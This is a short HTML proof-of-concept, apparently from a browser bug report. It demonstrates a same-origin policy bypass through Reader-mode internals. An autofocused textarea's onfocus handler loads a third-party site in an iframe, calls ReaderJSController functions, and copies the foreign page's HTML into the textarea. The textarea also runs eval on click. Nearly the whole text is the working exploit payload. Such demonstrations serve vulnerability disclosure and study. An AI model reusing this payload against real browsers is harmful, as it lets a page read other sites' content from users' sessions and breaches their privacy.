...
...
<textarea rows=10 cols=100 autofocus onclick="eval(this.value)" onfocus="
var out = this;
var f = document.createElement('iframe');
f.id = 'foo';
f.onload = function() {
ReaderJSController.prepareNextPageFrame('foo');
var t = ReaderJSController.nextPageArticleFinder();
out.value = t ? t.contentDocument.body.outerHTML : 'No content?';
};
f.src = 'https://www.example.com/';
document.body.appendChild(f);
">
We can't alert, but here is some content stolen from example.com to demonstrate SOP bypass: